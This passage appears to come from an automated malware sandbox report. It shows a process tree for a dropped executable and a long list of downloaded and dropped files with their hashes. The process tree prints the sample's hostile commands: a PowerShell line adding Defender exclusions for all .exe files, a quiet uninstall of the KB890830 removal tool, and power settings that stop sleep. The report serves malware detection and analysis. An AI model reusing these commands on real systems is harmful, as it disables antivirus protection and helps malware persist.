                              C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
                              1⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              PID:1704
                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                2⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5248
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                2⤵
                                  PID:6732
                                  • C:\Windows\system32\wusa.exe
                                    wusa /uninstall /kb:890830 /quiet /norestart
                                    3⤵
                                      PID:4536
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                    2⤵
                                    • Power Settings
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6848
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                    2⤵
                                    • Power Settings
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6868
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                    2⤵
                                    • Power Settings
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6876
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                    2⤵
                                    • Power Settings
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6860
                                  • C:\Windows\system32\conhost.exe
                                    C:\Windows\system32\conhost.exe
                                    2⤵
                                      PID:6408
                                    • C:\Windows\explorer.exe
                                      explorer.exe
                                      2⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6976
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2816 -ip 2816
                                    1⤵
                                      PID:2276
                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                      1⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:5884

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1DKHYZAK\soft[1]

                                      Filesize

                                      987KB

                                      MD5

                                      f49d1aaae28b92052e997480c504aa3b

                                      SHA1

                                      a422f6403847405cee6068f3394bb151d8591fb5

                                      SHA256

                                      81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

                                      SHA512

                                      41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FBCE046F\service[1].htm

                                      Filesize

                                      1B

                                      MD5

                                      cfcd208495d565ef66e7dff9f98764da

                                      SHA1

                                      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                      SHA256

                                      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                      SHA512

                                      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      16KB

                                      MD5

                                      9b8b11458fa459ca2f01d7d34ce8b35c

                                      SHA1

                                      91259e4f368f50c9550e627a37b8f31448c228ea

                                      SHA256

                                      20d2b84888643c18ad07079714826b4371880860f21c08bff5930e6fe22ba745

                                      SHA512

                                      7d45f392c3edd8c10c48f1cae27dd62ec6fc565ee5abac4ccd09528a83d558cda55f9a5a3781a0e203ae93ba5f8105c2fae8be4be3f39d584f5c2d2b80c39a2b

                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\activity-stream.discovery_stream.json

                                      Filesize

                                      21KB

                                      MD5

                                      838c11f608a0ee010a4f90f8bf2c9341

                                      SHA1

                                      cd1ebb04a3992aac359c4435d1c6aecd9281d155

                                      SHA256

                                      3ffd77124bc88426e1f88a01c8285222935dfb38628e4f2332079ec0d81864f2

                                      SHA512

                                      d335bfcfe33f2c78f7332e2b5821c1e41aa89765d85858450220cd6eec91b0d27c909eae0a9c2bbfdd83e7b264ed57800350f09b2a7588cf563f6666eea4d0b9

                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\cache2\entries\8DF0E9F84C5909278CF68CB55A683669F40995FB

                                      Filesize

                                      13KB

                                      MD5

                                      2368cae878259f404949fd0bf1909829

                                      SHA1

                                      2bac5b44d037ec45cbb5e1e5a63a3ebf1b32f337

                                      SHA256

                                      6e1849ce60a3e8bd49b7091a3b3db9b0f3ca200b5105f1c7c928417072ad393e

                                      SHA512

                                      4f846855f85d79b89f8221f82ef3d9c206593c473b91f1c52a65bcc0e0f4a46988f1d6310e97b0da60344defc99e5bb1f318145f7259640db917de6b8f745963

                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

                                      Filesize

                                      13KB

                                      MD5

                                      bd6018ee8ed6025060634ffee4ea58cc

                                      SHA1

                                      bc06f2fe79d02e6aaa338205e742902cd0576054

                                      SHA256

                                      fec6097262ca8bd542c1cb205a2cc6b616a1aa9ad83aa14a5d3c4b55c3805adf

                                      SHA512

                                      dcff89a881b3f39618b0ee291e47c5fa849eeb3843870235163089e8565133db70c8750832800c08f18231a6efd65b6d2ac12d6f341bd726843590257ad7d390

                                    • C:\Users\Admin\AppData\Local\Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE

                                      Filesize

                                      1.8MB

                                      MD5

                                      1ea9e7e7393e3bfdc50d8c613c1a7fb4

                                      SHA1

                                      79f3c21fb6de90dae7005202e69d71d0bef96028

                                      SHA256

                                      a5265bc009169c9d16c5571064b12e00428f1bb59bcd59f402ee90b5caa8b10a

                                      SHA512

                                      e20db7f8206a4a822bcdea638c2227fa7b2dd54f99d57ca77ef6a19fc7c6b1637e01423c29eb49a3f1be2efa79bbb976a80b3be50f858ba7766d27afc856713c

                                    • C:\Users\Admin\AppData\Local\Temp\10106150101\6988727892.exe

                                      Filesize

                                      3.8MB

                                      MD5

                                      f7605fc9a28d7dec2cbee884066a34f4

                                      SHA1

                                      074f8f0da6eb355d4a61e65a74cbb490b4f7c1bc

                                      SHA256

                                      634496a27b42f3a1735986573b1376a36535d7081bf761de51e537b2ae8686ae

                                      SHA512

                                      bc3b573e7856a70e5a2adc0ff2766756d5c3519263b0b520267cbcbe8472743cdf053738a00ad0457e2dfe90f83fd865e6cba997b5fa2ded2080e6f2c4936c37

                                    • C:\Users\Admin\AppData\Local\Temp\10106160101\20a66c7e87.exe

                                      Filesize

                                      445KB

                                      MD5

                                      c83ea72877981be2d651f27b0b56efec

                                      SHA1

                                      8d79c3cd3d04165b5cd5c43d6f628359940709a7

                                      SHA256

                                      13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482

                                      SHA512

                                      d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

                                    • C:\Users\Admin\AppData\Local\Temp\10106170101\b4727e7654.exe

                                      Filesize

                                      4.5MB

                                      MD5

                                      6bdda91d3a775718db3118d910faab64

                                      SHA1

                                      79f565f59b7f21e19ce9b798856c78c5ee3cf2a5

                                      SHA256

                                      334cb0a587c3bd2c2d7771f06f69a040ac999dc7d8c59fe8b25e63487d93b90f

                                      SHA512

                                      f17b4a5b20ff7c4f7af55e5c381d7a95f8565bb4d131128af98ec2267381caca0193fbb37e51d95825987abfed53bbacec3a468216a1d375e0dee611f6c7b612

                                    • C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe

                                      Filesize

                                      1.3MB

                                      MD5

                                      dba9d78f396f2359f3a3058ffead3b85

                                      SHA1

                                      76c69c08279d2fbed4a97a116284836c164f9a8b

                                      SHA256

                                      ff07f07ed8d9ebf869603100b975c0e172d66e62973150e3e4b918e2faacf4b1

                                      SHA512

                                      6c97569c239a28b1f8be0e599fb587f19506896217650fcedc3900a066ad1ef93c5242390cec90ac3cdd921d7bdc357beb9e402a149250ef211baeaaee2a99e7

                                    • C:\Users\Admin\AppData\Local\Temp\10106200101\445719b67a.exe

                                      Filesize

                                      1.8MB

                                      MD5

                                      dfbd8254f8f452c4efee8f92f623923f

                                      SHA1

                                      5ae96189ce5bf17bdbf2804227221ba605cffc2b

                                      SHA256

                                      6100c8b2a1b5b81783da1847a812af9c75849e44368cf9847eaea47e02b04699

                                      SHA512

                                      d7940f24817cd2c180babce402a1f532e50785c1a9a69180f57a32091eb48f7112300c2e9ed4a07e8eae60accfc82acd1d3d8b1cf4a8e7bb6549b06f58c988a4

                                    • C:\Users\Admin\AppData\Local\Temp\10106210101\9133893bdd.exe

                                      Filesize

                                      3.0MB

                                      MD5

                                      5e0c2cf7bd029900ec4a3afa38bcb068

                                      SHA1

                                      251a68ef3b86e7c4031005b66d74e0874d5b6c03

                                      SHA256

                                      f46df9a7f5640840c89c13e9ecc9bcc33b2fba690935f6df1e87275a27f024a9

                                      SHA512

                                      a9316189960f596dd1f4f5c801078f58d94d6f8d94f0a24d6e1e6acdb7433fea522351e4fc9ac59798c16dbf9614a92c9628fc123d118eb4307c6fd255d75ad1

                                    • C:\Users\Admin\AppData\Local\Temp\10106220101\9f85653241.exe

                                      Filesize

                                      1.7MB

                                      MD5

                                      1eaae50ccebf76faab354513012be540

                                      SHA1

                                      11c9e9781d192c32aac160b67a50af48e8c11b18

                                      SHA256

                                      d47bd3f6b206c1ab8754465ae0afd173e44a9383d676df34e1e9618f25519657

                                      SHA512

                                      5bf2d4a2b4dbefc207bb8eb576f8bc9ecfb4b38f04dbe8c47a76ef26817a39cac02154a8b18d060ccf445681d644b5c7f16a9614cffacb0e36194844e00ef317

                                    • C:\Users\Admin\AppData\Local\Temp\10106230101\3dafbcc94d.exe

                                      Filesize

                                      950KB

                                      MD5

                                      31701a31a3ea0750c510baf8084b8054

                                      SHA1

                                      2ad171cbb579f4103afedab709b8f21adb480300

                                      SHA256

                                      c37416eca1ff104548d11107d8c8c9cc502629741b83c132e42069db760a6d87

                                      SHA512

                                      bb5dbaeeaa51652fdce26097942d363cb4bbcb10b42d1e200cc05ff78e2ad414305c85d50dd7805f6a91116ca34b440af65944f4a601ef238fa2536e017bc516

                                    • C:\Users\Admin\AppData\Local\Temp\10106240101\de5df7d9f4.exe

                                      Filesize

                                      1.7MB

                                      MD5

                                      bcda678e76a1f36a44a93e5f0cddc418

                                      SHA1

                                      7a15a7d5b33fd87edcda14815ca6130f527f6de9

                                      SHA256

                                      13f9ef51100d5fc3d9f388f7c224347970df1461cc4f0db8c343446c3b8edefd

                                      SHA512

                                      9045cc0169b0a75d9e0e81477459afa45197c2098d001e5561f1e0a900b957826e7a59f91ef7d4551fa27ad0342458a74cf4a1b98e43a14f0e69f8ab22b399f7

                                    • C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe

                                      Filesize

                                      2.0MB

                                      MD5

                                      6006ae409307acc35ca6d0926b0f8685

                                      SHA1

                                      abd6c5a44730270ae9f2fce698c0f5d2594eac2f

                                      SHA256

                                      a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b

                                      SHA512

                                      b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

                                    • C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe

                                      Filesize

                                      5.0MB

                                      MD5

                                      ddab071e77da2ca4467af043578d080c

                                      SHA1

                                      226518a5064c147323482ac8db8479efd4c074f8

                                      SHA256

                                      d3271bc7c315bd03e070cc2048c0349a73ecd858df500f2a2e2f09d606dfe79c

                                      SHA512

                                      e3dc210bef348b324c9a00e32648b50a6cd0f078eefa436b201afd10853b648654de3fd993a1cea9d1aa4e7dde6587de1c1f8c09e09af7c62dde8536fd43d6d8

                                    • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe

                                      Filesize

                                      415KB

                                      MD5

                                      641525fe17d5e9d483988eff400ad129

                                      SHA1

                                      8104fa08cfcc9066df3d16bfa1ebe119668c9097

                                      SHA256

                                      7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a

                                      SHA512

                                      ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

                                    • C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe

                                      Filesize

                                      5.7MB

                                      MD5

                                      5fb40d81dac830b3958703aa33953f4f

                                      SHA1

                                      8f4689497df5c88683299182b8b888046f38c86a

                                      SHA256

                                      b2395af2b5497ded848bfffc2192747510420b0a7bab9897322aed765c66d9dc

                                      SHA512

                                      80b400bb79c4cbed1fb35af0fae1b88b399d679f7c99c625214082d143f51d381436abb27284b0205bdacf38cafa742a32c46ce8136ad7684d566d2e19bfab8e

                                    • C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe

                                      Filesize

                                      48KB

                                      MD5

                                      d39df45e0030e02f7e5035386244a523

                                      SHA1

                                      9ae72545a0b6004cdab34f56031dc1c8aa146cc9

                                      SHA256

                                      df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

                                      SHA512

                                      69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

                                    • C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe

                                      Filesize

                                      350KB

                                      MD5

                                      b60779fb424958088a559fdfd6f535c2

                                      SHA1

                                      bcea427b20d2f55c6372772668c1d6818c7328c9

                                      SHA256

                                      098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221

                                      SHA512

                                      c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wivicl03.eck.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Users\Admin\AppData\Local\Temp\rQw2foPtZ.hta

                                      Filesize

                                      717B

                                      MD5

                                      a6445de01a309316601220777fca85c3

                                      SHA1

                                      eb6d06c7d7b158392a6f3853c365dc54069a1d11

                                      SHA256

                                      e28a96960bbe9a96c8bd77464156d295e2b66a31121525017fbc5f8bb4ce4459

                                      SHA512

                                      79ef968201f42ea71971dad3dde167d5e864b92a3302800bceb92a040450a7fedb355be3aea7f0f48ef247a2dc91abdb00376217a275789b8b362e9ba92c0648

                                    • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                      Filesize

                                      479KB

                                      MD5

                                      09372174e83dbbf696ee732fd2e875bb

                                      SHA1

                                      ba360186ba650a769f9303f48b7200fb5eaccee1

                                      SHA256

                                      c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                                      SHA512

                                      b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                                    • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                      Filesize

                                      13.8MB

                                      MD5

                                      0a8747a2ac9ac08ae9508f36c6d75692

                                      SHA1

                                      b287a96fd6cc12433adb42193dfe06111c38eaf0

                                      SHA256

                                      32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                                      SHA512

                                      59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin

                                      Filesize

                                      10KB

                                      MD5

                                      ba61df5bdc1116bdb2b883a64231aa19

                                      SHA1

                                      27ad90c4e0aaa2470eb5e3b4b1a5f5d817bc4d8a

                                      SHA256

                                      091d4ea026c4a8b541b6cfae59c9a936d6dbbec698a7a15e411ab3cae25dc447

                                      SHA512

                                      b28121b41e25b934377f565883c9a31dd7c46b7b465e586506d531fe2c4454dcfcb6c8027e192c75e175babd9929c3cd41648eb62100e3c8fdc23d7b169d11d2

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin

                                      Filesize

                                      13KB

                                      MD5

                                      c34295a0419b802524024f3d87c96efe

                                      SHA1

                                      efbfd4da7230e72adabb0b847eb12790105468c5

                                      SHA256

                                      e9cf80bcb727853daa5c171e675ed3c03d8b9497e5488fa5cb069ff1d10efeb6

                                      SHA512

                                      750fbb2117352235bf5d2112a00531ac9127bcfa137a10dff227c459ccda92e7068e038e259efe6b7eeb668671b5cd9b78c67d882d9653ab6a52843e63797886

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\cert9.db

                                      Filesize

                                      224KB

                                      MD5

                                      13b576f6139ea98f8d41fa3dc905476a

                                      SHA1

                                      902f587753387fca8f1014c42751b09f74710e97

                                      SHA256

                                      1d0e7ef425eb1fb9016bdabe632bb6a1abfb36db6fb02768fb1c2b4d9ea0e1bc

                                      SHA512

                                      62a511516012d7adb117af846177122cf5f7be4da1ad5051b9206b07b3c4994c2ec3fc257e4a13d64c0d1f2ce9a43287ea4aef05bb8408c2bb6a3b61b0b85158

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\cert9.db

                                      Filesize

                                      224KB

                                      MD5

                                      978608507fecea0e8d3683b0d88e8376

                                      SHA1

                                      d707657a56693231726cfd632b46e05fbbe44774

                                      SHA256

                                      feb73f9743e294b17e6500f270c3ecdc3126d313631395a0878565896f4b9b42

                                      SHA512

                                      fcf264714947a806acbac32503f2d9b7740f59f231f0c3955015c742954102d24da292d2136ed3ef52c5f49905e79a29d0136ae8cb6ad5f8c62f083ea71f3a14

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp

                                      Filesize

                                      5KB

                                      MD5

                                      46df16241e20466c22a860b67b0fcabb

                                      SHA1

                                      a35042e957121b0bbbebfea17a75329d9ddc6f0a

                                      SHA256

                                      2185a273b6b2328f7b2d13eddeb61e1a6c97c39883b3cf9d6d052fdcb09c138b

                                      SHA512

                                      50704276c25eada1f0404b349bcced230f0209df974bbd2a3e63a7a9f892655e43635910312c216367f58135e64d1490a010ad31aecfbe0cbed52111a67eb002

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp

                                      Filesize

                                      15KB

                                      MD5

                                      11f760def2f8bd7e243a4ef79181901b

                                      SHA1

                                      f86fa4fc3b74731815a2a467ad7b3fdd86f2105a

                                      SHA256

                                      5c7db2f61be14517237c8bc9a3eb830d4ecf8988b5cd1530fe1fa5df521c4feb

                                      SHA512

                                      f28e504a810367ca5d734ab0738eeda3bac3605fdfccdf9dfb4de00bde236c8622df2128bde9f2ce0f4de0f6165b493714844018e3470eefc9a4853c2f8e697a

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\0249345d-935e-420e-8e66-73b72d82a96e

                                      Filesize

                                      982B

                                      MD5

                                      c2aae085f7d5e96b34fb528dd88fe9a9

                                      SHA1

                                      b72d3b356c91aa6c36693a32403ac52d6b20bb22

                                      SHA256

                                      94db61be4d6c962d31c98795e8efb88ad852044464e94b5fda15ca51d3922960

                                      SHA512

                                      55202d20e389492e659657c05fa97548f0298b075b76dd46e73c12fc14655098faa51fd052f4e0469b57e8a52019a68e0b45bb0464c7d5303fe9afaf031836e3

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\a4964329-7c54-4973-9351-1bb0db472f3c

                                      Filesize

                                      28KB

                                      MD5

                                      1a60a74116a4800ea67fed203e25a9e5

                                      SHA1

                                      2c90f8d526a5e803853bce599601f726bba3cb75

                                      SHA256

                                      2a8283ea68155ab32c0744d51e9dcd6de0db56a860cfe5e9322ca3f3c985817d

                                      SHA512

                                      d739b8f2a645902232e5f106ea395b5991aaa8a5ec2a97700f16f98bfba43837cc47c8a88a2da2c24dce90f1bebfa1d83d168174b4f7af2d16976f16ca5b27d8

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\d81452c1-4219-42ca-bcfb-3965050d9961

                                      Filesize

                                      671B

                                      MD5

                                      aea95ee2b3afd9f1e321340621a47b72

                                      SHA1

                                      fc591eb33593181de043e7cdc9869de171244611

                                      SHA256

                                      204f941f3a510c6708d43b10a0826929497e3a035afd186bcf8a5f14500ed701

                                      SHA512

                                      74cb8b99f5d0392921ba6ea77e67a826485b246465e2aa15674ab22476e970480575561ed12b1590a921e12799d1450412e123c3a5abbee5cc1760fea8cedf99

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                                      Filesize

                                      1.1MB

                                      MD5

                                      842039753bf41fa5e11b3a1383061a87

                                      SHA1

                                      3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                                      SHA256

                                      d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                                      SHA512

                                      d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                                      Filesize

                                      116B

                                      MD5

                                      2a461e9eb87fd1955cea740a3444ee7a

                                      SHA1

                                      b10755914c713f5a4677494dbe8a686ed458c3c5

                                      SHA256

                                      4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                                      SHA512

                                      34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                                      Filesize

                                      372B

                                      MD5

                                      bf957ad58b55f64219ab3f793e374316

                                      SHA1

                                      a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                                      SHA256

                                      bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                      SHA512

                                      79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                      Filesize

                                      17.8MB

                                      MD5

                                      daf7ef3acccab478aaa7d6dc1c60f865

                                      SHA1

                                      f8246162b97ce4a945feced27b6ea114366ff2ad

                                      SHA256

                                      bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                      SHA512

                                      5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs-1.js

                                      Filesize

                                      14KB

                                      MD5

                                      2a8c96039db0b888414904d1ca81a0ea

                                      SHA1

                                      32d79472d889e90af6ecf626c7bbad2ed40b963f

                                      SHA256

                                      74e2e32793bde9dc226a158f6b738d1a89bb4fcd3215f24e2d011bc543f34ee1

                                      SHA512

                                      1a3693967b080dace24f224504c31b190d509dc724426a623bb3652d003c24dfe4ac56700f1459d20f69487212df0d61081e15c65bd86f6799f1e9a437cff322

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs-1.js

                                      Filesize

                                      11KB

                                      MD5

                                      e5532339a770bb46dd2df6c5c308eaae

                                      SHA1

                                      56fe6185a229f2cad5623a6f4a65a9cab1f87f56

                                      SHA256

                                      b1590947c03e3cf84e60d9c76492c7beef488baa018926bd1aa69da02b8ed7a3

                                      SHA512

                                      bc009c3ed648e3c9c2c447b8daff87ddd8a0af7e847682780c8344e9080f5020660b1fcc48dd048c124bdaa9691d5081b977e608930e29ee4a97edf4bf422910

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs.js

                                      Filesize

                                      12KB

                                      MD5

                                      1b0a91bef7c815399e03265581833cdb

                                      SHA1

                                      7996f8719c1cff797231989aed1a9474471195d6

                                      SHA256

                                      87a878ba311b2c8b27505d0bba6043f4acdd59cc5d0b3d38dc0aade1c3ee2f38

                                      SHA512

                                      a339f7a7de20ee545500618a2d15845b4d20ef39c1d2ea862a1fe5a8f7276206ee07bea86eb25ca662fa654860a72ba3db86996439b64cc282ad2579c4dffd2a

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs.js

                                      Filesize

                                      9KB

                                      MD5

                                      76575cca78780937fe074e53b17573f7

                                      SHA1

                                      64ec45eecd1d3e88a3cf479740cc6981200678de

                                      SHA256

                                      e121a7f3f37fa5d03818c7e4b18833bc5159b557dd4c19d36899338d63c87837

                                      SHA512

                                      b8516e41e9c2429714deb4f0f6d3c171eeab7fb3ed43e32de89bf505a7abe7db7b704063e22d19ae2f7245eacf060554f585cce3cffbfad82bbd76966e179f2c

                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs.js

                                      Filesize

                                      9KB

                                      MD5

                                      606bd2c0954582b79e16f2f61bb7ea96

                                      SHA1

                                      21cc1cd5c209dea1f0c623166f4f54f67e744cd9

                                      SHA256

                                      674d94a90bb141f96dd370a5723dd4c4a938b5cc02cea75d7dd7d5c87ee29f55

                                      SHA512

                                      5f79413cbf10e87409917042455df6dc7cdf69c57ff79557b85f2cd82626f345949040cf8bcff30f0e6da010ae73ccc336a9fb8d4952a03bed13471a6ca5babe

                                    • C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe

                                      Filesize

                                      446KB

                                      MD5

                                      4d20b83562eec3660e45027ad56fb444

                                      SHA1

                                      ff6134c34500a8f8e5881e6a34263e5796f83667

                                      SHA256

                                      c5e650b331fa5292872fdaede3a75c8167a0f1280ce0cd3d58b880d23854bdb1

                                      SHA512

                                      718bd66fcff80b8008a4523d88bd726cdbc95e6e7bdb3f50e337e291294505ed54e6f5995d431968b85415e96f6f7ed37381ca021401ad57fda3b08a1f0c27f4

                                    • C:\Users\Admin\Desktop\YCL.lnk

                                      Filesize

                                      2KB

                                      MD5

                                      2cf9a397557356cf758c3dbfbf50ae6f

                                      SHA1

                                      925ff9d421cb3cf66adccb5c901d4a9397b8d2a8

                                      SHA256

                                      2d1d66e44c7e73bf5e4b694ed05edc34f51efba57330383c23dbd3b4ce0348a8

                                      SHA512

                                      84bee44363020fa85ac92451fa61a34f4118854cd64153d128fdec37c93089a3560ee08c8f82166780e93cbde13c4e99135dd45480d1cfd7cc64dc5a00c37e2c

                                    • C:\Windows\Temp\{4956A76E-DEB4-45ED-8D69-7E9A2D141050}\.ba\Centre.dll

                                      Filesize

                                      650KB

                                      MD5

                                      682f74b9221d299109a3d668d6c49613

                                      SHA1

                                      93b98dbe3fbe1830f9de24d1c36ebc7d7da3738b

                                      SHA256

                                      f4ffce0b075ea7f473e6c8f04688b3abc0df5bf56e3ff4497fece42ab714d3b5

                                      SHA512

                                      d2995305a2452363932491f25dc0a51a1d2daf2f62d1feb3290958604981dd2a6f77c88d9ea7215d188f1e6898b9c6ed1686c1a2437b84be38a9282c325c8d8f

